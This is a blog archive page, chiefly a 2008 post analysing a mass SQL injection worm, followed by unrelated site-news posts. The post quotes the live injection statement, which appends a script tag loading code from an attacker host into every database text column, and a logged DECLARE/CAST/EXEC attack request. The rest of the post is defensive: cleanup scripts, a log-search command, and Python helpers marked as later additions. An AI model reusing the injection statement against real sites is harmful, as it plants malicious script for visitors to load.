
Technical Post about new SQL Injection

Wetwired Time Wednesday, August 6th, 2008 at 12:48 pm by davis

Wikipedia says,

“SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.”

New SQL injection variant I stumbled on at work

Basically what it does is open 2 iframes and then install a cookie; it's also injecting into whatever database is there. I have not gone through all the code, but it has already changed since this morning. It is a very bad little piece of java.

*** DO NOT GO TO THIS URL (I have added spaces to eliminate accidental clicking) ***

Here is the code for the new injection:

BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo. 3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo. 3322.org/csrss/w.js"></script><!--''')

Notice the beginning of the insert. It's not the traditional <script src= opener; it's "></title><script src= (a quote and a bracket to close whatever attribute or tag the value landed in, then </title>).

The bastards did it to get around the reverse-based cleaning script. Here is a modified script that takes the new "></title><script src= marker into account. Also notice the HTML comment opener (<!--) tacked onto the end: because the stored value no longer ends with </script>, the previous cleaning script's WHERE clause (like '%<script%</script>') no longer matches it.

/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
-- xtype 99/35/231/167 = ntext/text/nvarchar/varchar columns of user tables
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- The PATINDEX pattern is the 10-character marker "></title> reversed; "+ 9" is that length minus one,
-- so everything from the last marker to the end of the value is cut off.
-- Note: convert(varchar(max)) will mangle non-ASCII text in the ntext/nvarchar columns.
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar(max),['+@C+'])), len(convert(varchar(max),['+@C+'])) - (patindex(''%>eltit/<>"%'', reverse(convert(varchar(max),['+@C+']))) + 9))) where ['+@C+'] like ''%"></title>%<!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

The old cleaning script is below, for the references I made above.
/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- Pattern is the 7-character "<script" reversed, hence "+ 6".
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar(max),['+@C+'])), len(convert(varchar(max),['+@C+'])) - (patindex(''%tpircs<%'', reverse(convert(varchar(max),['+@C+']))) + 6))) where ['+@C+'] like ''%<script%</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/
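Before running either cleaning script's UPDATE across every text column, it is worth checking its arithmetic on a few sample values. Here is an added Python model (mine, not part of the original post) of the reverse/right/patindex expression and WHERE clause used by both the new and the old script; the injected strings and the attacker.invalid host are constructed placeholders, not the real URL.

```python
import re

def patindex(pattern: str, s: str) -> int:
    """Mimic T-SQL PATINDEX('%p%', s) for a literal p: 1-based index, 0 if absent."""
    i = s.find(pattern)
    return i + 1 if i >= 0 else 0

def right(s: str, n: int) -> str:
    """Mimic T-SQL RIGHT(s, n): the last n characters (empty when n <= 0)."""
    return s[len(s) - n:] if n > 0 else ""

def like(value: str, pattern: str) -> bool:
    """Minimal T-SQL LIKE supporting only the % wildcard (all these scripts use)."""
    rx = ".*".join(re.escape(part) for part in pattern.split("%"))
    return re.fullmatch(rx, value, re.DOTALL) is not None

def sql_strip(value: str, marker: str) -> str:
    """Mirror of the scripts' SET expression:
        reverse(right(reverse(v), len(v) - (patindex('%rev(marker)%', reverse(v)) + len(marker) - 1)))
    i.e. cut from the LAST occurrence of marker to the end of the value. The literal
    '+ 9' / '+ 6' in the scripts is len(marker) - 1. If the marker is absent (pos = 0)
    the arithmetic chops the wrong characters, which is why the WHERE clause matters."""
    rev = value[::-1]
    pos = patindex(marker[::-1], rev)
    return right(rev, len(value) - (pos + len(marker) - 1))[::-1]

NEW_MARKER = '"></title>'          # 10 chars -> '+ 9' in the new script
OLD_MARKER = "<script"             # 7 chars  -> '+ 6' in the old script
NEW_WHERE = '%"></title>%<!--'
OLD_WHERE = "%<script%</script>"

# Constructed sample rows; the host is a placeholder, not the real injection URL.
INJ_NEW = '"></title><script src="http://attacker.invalid/w.js"></script><!--'
INJ_OLD = '<script src="http://attacker.invalid/w.js"></script>'

def clean_row(value: str, where: str = NEW_WHERE, marker: str = NEW_MARKER) -> str:
    """Apply one cleaning script's rule to a single value: rows the WHERE clause
    does not match are left alone, matched rows lose everything from the marker on."""
    return sql_strip(value, marker) if like(value, where) else value

if __name__ == "__main__":
    print(clean_row("Welcome to the site" + INJ_NEW))                        # Welcome to the site
    print(clean_row("x" + INJ_NEW, OLD_WHERE, OLD_MARKER) == "x" + INJ_NEW)  # True: old script misses it
```

A value hit twice loses only the last copy per run, so the script may need to be run more than once.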

To find out which web pages are being hit, go to the root of your web logs.

In IIS each site's log folder is named with a site identifier (W3SVC followed by a number), which tells you which site was hit.

From the root of the web logs, issue this command (it searches today's log; if the hit was yesterday, search yesterday's file instead):

findstr /s /i /n /c:"declare" ex080807.log >> sql_inj_sites_080807.txt

The /s switch searches all sub-folders recursively for the word declare, /i makes the match case-insensitive, and /n prints the line number of each hit.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x<hex payload omitted>%20AS%20CHAR(4000));EXEC(@S); 200

I truncated the rest of the line because it's not important, EXCEPT for the HTTP return code.

200 is of course OK, which means the web server processed the request.

So the injected query string hit index.asp in the site whose identifier is W3SVC12345678.

You can find out which site that is by going into inetmgr and looking at the site identifier field.

If you are a little more curious, you can recover the SQL being injected by converting the hex between the 0x and the %20AS% into ASCII; that gives you the SQL code being run.
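As an added example (mine, not from the original post), here is a small Python parser for the findstr output above: it pulls out the site identifier, page, client IP and status from each hit and decodes the hex between 0x and AS CHAR(...) back into SQL. The field order is assumed from the post's sample line, and the log line and payload below are constructed.

```python
import re
from urllib.parse import unquote

# One findstr hit line: "<relative log path>:<line number>:<W3C log fields>".
HIT_RE = re.compile(r"^(?P<file>[^:]+):(?P<line>\d+):(?P<rest>.*)$")
# The hex blob between "0x" and " AS CHAR(...)"; N-prefixed types carry UTF-16LE text.
CAST_RE = re.compile(
    r"CAST\(0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<type>N?(?:VAR)?CHAR)\(\d+\)\)", re.IGNORECASE)

def decode_hex_payload(hexstr: str, sqltype: str) -> str:
    """Turn the 0x... blob back into the SQL text it carries."""
    raw = bytes.fromhex(hexstr)
    return raw.decode("utf-16-le" if sqltype.upper().startswith("N") else "latin-1")

def parse_hit(line: str):
    """Parse one findstr hit. The field order (date time site host c-ip method uri
    status) is assumed from the post's sample line; check your log's #Fields: header."""
    m = HIT_RE.match(line)
    if not m:
        return None
    fields = m.group("rest").split(" ")
    if len(fields) < 8:
        return None
    _date, _time, site, host, client_ip, _method, uri, status = fields[:8]
    query = unquote(uri)
    if "DECLARE" not in query.upper():
        return None                         # findstr hit, but not this injection shape
    cm = CAST_RE.search(query)
    return {
        "file": m.group("file"), "site": site, "host": host, "client_ip": client_ip,
        "page": uri.split("?", 1)[0], "status": int(status),
        "processed": status == "200",       # 200 = the web server ran the request
        "sql": decode_hex_payload(cm["hex"], cm["type"]) if cm else None,
    }

# Constructed sample: a harmless statement hex-encoded the way the worm encodes its
# payload, inside a log line laid out like the post's (placeholder client IP).
SAMPLE_SQL = "SELECT 'constructed sample payload, not a real attack'"
SAMPLE_LINE = (
    "W3SVC12345678\\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 "
    "MY-WEBSERVER-HOSTNAME 192.0.2.10 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);"
    "SET%20@S=CAST(0x" + SAMPLE_SQL.encode("latin-1").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S); 200"
)

if __name__ == "__main__":
    hit = parse_hit(SAMPLE_LINE)
    print(f"{hit['site']} {hit['page']} from {hit['client_ip']} status {hit['status']}")
    print("decoded SQL:", hit["sql"])
```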

Comments/Questions etc.  Thanks.





Pardon our Mess

Wetwired Time Wednesday, July 16th, 2008 at 11:18 am by pylorns

This is a two-for-wednesday.  It would have been Tuesday but yeah… coding problems.

Number one:  As you can see wetwired has the new look that we promised.  I’ve been working on coding this for a while and given that I hate coding for wordpress, I think it’s turned out reasonably well.  There are slight issues with the sidebar and different browsers.  I’ll be continually working on it to try to address the issues that crop up.   Incidentally if anyone is good with wordpress and divs and this stupid widgetized sidebar and can figure out why the twitter stuff loads 5 different ways from sunday on every browser, please let me know.

Number two: Wordpress 2.6 has been released.  This means new features for us, and maybe for you.  I tested slightly on our sandbox to verify all hell didn’t break loose and I’ve now updated wetwired to this latest version.  Let me know if you see something broken I might fix it, or I might laugh in your face.




Wetwired Performance Issues

Wetwired Time Saturday, June 14th, 2008 at 11:41 am by pylorns

You may or may not notice, but wetwired has been running extremely slow this morning and it was running slow last night.  At times it takes over 1 minute to load the page.  I have done some extensive troubleshooting with firefox, and firebug plugin and after turning off all plugins - defaulting back to the generic theme of wordpress all signs point to DB queries being the problem - meaning my host (godaddy) is having DB issues or performance issues.  Posting a static page works just fine and displays correctly.  I also noticed that they just updated php on the godaddy servers - who knows this could also be a factor.

I did some searching to see if there were wordpress performance posts or insight and there was - but I’ve covered the bases for reasons why it would be slow as noted above.  I can only wait until my host gets back to me.  Incidentally, when you call them you get a phone person who is nice but is not technical.  They then tell you they will escalate the issue and you’ll get an email back in a couple hours.  It’s been a couple hours.. no word.  We’ll see how good their support is.




Wetwired Updated

Wetwired Time Saturday, April 26th, 2008 at 10:36 am by pylorns

Just updated to Wordpress 2.5.1 which contains 70 or so fixes and some security bugs etc.  Additionally they add a hash to the cookies which is specific to the site that makes it harder to hack.  Anyway, you guys won’t notice much, the changes are mostly all back end.




Update: Site Back Up

Wetwired Time Saturday, March 15th, 2008 at 3:11 pm by pylorns

I’ve grabbed the K2 theme and threw up an older custom drawn header I had made some 2 years ago but never posted.  If you’ve followed any of the wetwired news posts about the site itself you’ll remember that several times I have begun to re-design the site and have not moved forward with it.  This time I have a new theme that I’ve got an artist working on and once its done I’ll be working hard on creating the wetwired theme for the site and then uploading it.

So needless to say here is the site in all its temporary template glory, but fully converted to wordpress including all the old posts and comments no less.  The forums will not be going back up, feel free to comment and notice that the comments actually work again!




New Site?!

Wetwired Time Tuesday, October 9th, 2007 at 10:16 pm by pylorns

So I finally convinced Jenn to get a website and we’ve commissioned an artist to do some initial work for her site. We actually got the artwork done before she purchased the site. So tonight on godaddy.com we registered www.jennswanderlust.com - so within the next couple weeks I’ll have the site up and running with wordpress and some pretty snazzy graphics. I’ll also be incorporating some great new ajax plugins that are available for it as well. Anyway lots of good things - actually once I’m done working on her site and tooling it up, its back to wetwired and other domains that I own. I’ll be working on a new format like I’ve been saying I’m planning on doing. Oh and the forums will be gone too.




Face lift

Wetwired Time Monday, November 13th, 2006 at 6:57 am by pylorns

Stay tuned for a face lift for wetwired very shortly.




Introducing Movie Buddies

Wetwired Time Saturday, July 22nd, 2006 at 8:54 am by pylorns

Head over to http://moviebuddies.net wetwired’s sister site to get the latest on movie news trailers, and participate on the forums. The idea behind movie buddies is basically allowing people who are movie fans to discuss and schedule meets to go and see movies as a group. The site has not officially launched but you can get a sneak peek, sign up on the forum now for a limited time! How’d you like that corporate advertising speech? Anyway, check it out, we like it, and we are looking for help with it as well.




Vote For Wetwired

Wetwired Time Friday, December 9th, 2005 at 4:12 pm by pylorns

Wetwired is nominated for the Best Blog Design on the 2005 Weblog Awards. Please go out and vote for us! Remember you can vote once EVERY 24 hours. This post will remain at the top of wetwired until the polls are closed on December 15th.

About this Design:

Wetwired is designed by Magnified Designs (pylorns etc) a custom web design company.

Graphic Design is done by Tyler Sticka. Almost all the cartoons are concept by pylorns and drawn and colored by Tyler.

The CSS and backend coding is designed and tested for the current most used browser, Internet Explorer 6.0 and then for Firefox. While I would like to code completely for Firefox, I feel it would be a bad idea to alienate the many users who do not know the ins and outs of other browsers.

The CSS is broken up into 2 separate style sheets and seems to work for the most part…

The concept is based on 1930’s and 40’s film noir. The top logo is broken up into several smaller images and each author has his, her own posting image.

The Publishing Software is Movable Type Version 3.2

The Forum Software is XMB Forums v 1.9.1 Nexus. Color Schema by Magnified Designs

Thanks to Tyler, Wetwired has some buttons that you can link to and place on your site; just copy the code below. There are two separate buttons depending on your webpage style light and dark. Paste the exact code on your website navigation bar. If you have any questions or problems shoot an email to pylorns (at) gmail [dot] org

For Dark Backgrounds

<a href="http://weblogawards.org/2005/12/best_blog_design.php">
<img src="http://www.wetwired.org/img/vote_button_darkbg.gif" alt="Vote Wetwired!" border="0" ></a>

For light backgrounds:

<a href="http://weblogawards.org/2005/12/best_blog_design.php">
<img src="http://www.wetwired.org/img/vote_button_whitebg.gif" alt="Vote Wetwired!" border="0" ></a>

And remember the competition is determined.




Weblog Awards 2005 Finalist

Wetwired Time Sunday, December 4th, 2005 at 3:27 pm by pylorns

Yep Wetwired is a finalist for the 2005 Weblog awards for Best Blog Design. Tomorrow the polls open so make sure to go vote!




2005 Weblog Awards

Wetwired Time Friday, November 18th, 2005 at 7:58 am by pylorns


http://weblogawards.org/ hosted by wizbang.
Ok so we’re up for best blog design here:
Best Blog Design

So what I’ve done is gone through and looked at all the current sites that are designed well. Of course we think we have the best because well, its had many many redesigns and we have an artist that is the best.

1. Wetwired #1 yeah! But look, Using Movable type, Clean looking with great cartoons, and post icons that match. You can tell a lot of time and effort goes into wetwired.

2. Dizzy Girl always has multiple designs ranging from really cool to kinda blah.. right now the current skin she is using doesn’t stand out. I do hand it to her, she puts some serious effort into her friday posts!

3. The shape of days I have to hand it to them, they got a professional designer like moi, to design it. Its very good, the CSS layout is the way to go. I view this is real competition. - Update the professional designer/coder/”they” is just Jeff the owner of the blog. - Thanks Jeff for clarifying.

4. My Vast Right Wing Conspiracy Also not done by the author of the blog, professionally designed.. mostly. But listen, if its a right wing conspiracy, why are all the graphics on the left?!

5. Sharp as a Marble Using a notebook style layout, which has been done before, but it still looks like they put in effort. What would have been cooler is that if the posts would have been on the lines of the notebook instead of a white box on top of it.

6. Gentlemen Prefer Blogs Decent graphics, the professionally designed look - and in fact it is, nice little graphics for the posts too.

7. Lord Boom Boom These guys are bringing up the rear, the image is kinda cool, but nothing really stands out as being clean and concise. I guess the color scheme just bugs me.

8. Just a girl in the world Its clean, all the graphics mesh together.

9. Scrubbles They are so so, its better than some of the others on blogger still.

10. LJC FYI Themed for fall colors, interesting little cartoons, kinda similar to wetwired, not bad.

So there you have it, the ones that currently stand out against the crowd, the rest are using default templates of blogger or movable type, or really haven’t put any effort into designing. Or maybe you have, but it doesn’t show. Having a good design on your blog takes a lot of thought-out work and some artistic talent, form follows function.




Weird Searches to get here

Wetwired Time Friday, November 18th, 2005 at 7:02 am by pylorns

It’s that time again when we look at what brought you sick bastards to this site. All I have to say is “China Kitty Porn” you are one weird wanker how the hell you even got here by that search is beyond me. Now all you fluffers out there, we salute you. Oh midget lovers too.

1 21 7.42% fluffer pics
2 9 3.18% angela devi
3 7 2.47% lamb and lynx gaede pics
4 6 2.12% gail o’toole
5 6 2.12% ken slaby
6 4 1.41% gail o’tool
7 4 1.41% lamb and lynx gaede
8 4 1.41% wetwired
9 4 1.41% wetwired.org
10 3 1.06% adult film fluffers
11 3 1.06% bridgette the midget
12 3 1.06% dell layoffs october 2005
13 3 1.06% лещен
14 2 0.71% %22caption this pic%22
15 2 0.71% all about american holidays by mayme r. krythe
16 2 0.71% austin
17 2 0.71% austin texas blog
18 2 0.71% china kitty porn
19 2 0.71% cnn terri schiavo
20 2 0.71% deadpool pics




More testing

Wetwired Time Tuesday, October 18th, 2005 at 11:16 pm by pylorns

Yet another test for tags.. it’d be nice if they made this just a tad bit easier..

quote! test test




